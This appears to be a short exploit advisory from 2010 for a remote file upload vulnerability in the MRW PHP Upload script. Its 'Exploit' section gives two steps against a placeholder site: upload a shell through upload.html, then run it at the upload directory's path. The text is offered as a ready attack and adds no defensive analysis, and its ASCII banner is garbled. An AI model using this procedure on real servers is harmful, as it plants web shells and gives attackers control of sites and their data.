|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38  |  # Date: 12/02/2010 # Author: Phenom # Software Link: http://www.mrwebmaster.it/_store/script/php_luke_mrw_upload.zip # Version:  # Tested on: Windows xp sp3 ------------------------------------------------------  ______ |__ \| |  | |__) | |__ ___ _ __ ____ __ ___ |___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \  | || | | |__/ | | | (_) | | | | | | |_||_| |_|\___|_| |_|\/__/|_| |_| |_| ------------------------------------------------------ ####### MRW PHP Upload Remote File Upload Vulnerability ##################### # # Author : Phenom # # vendor : www.lukeonweb.net # ################################################################################# ####### Exploit ################################################################# # # 1- http://site.com/path/upload.html # # upload your shell  # # 2- http://site.com/path/upload/yourshell.php # # get your shell # #################################################################################  |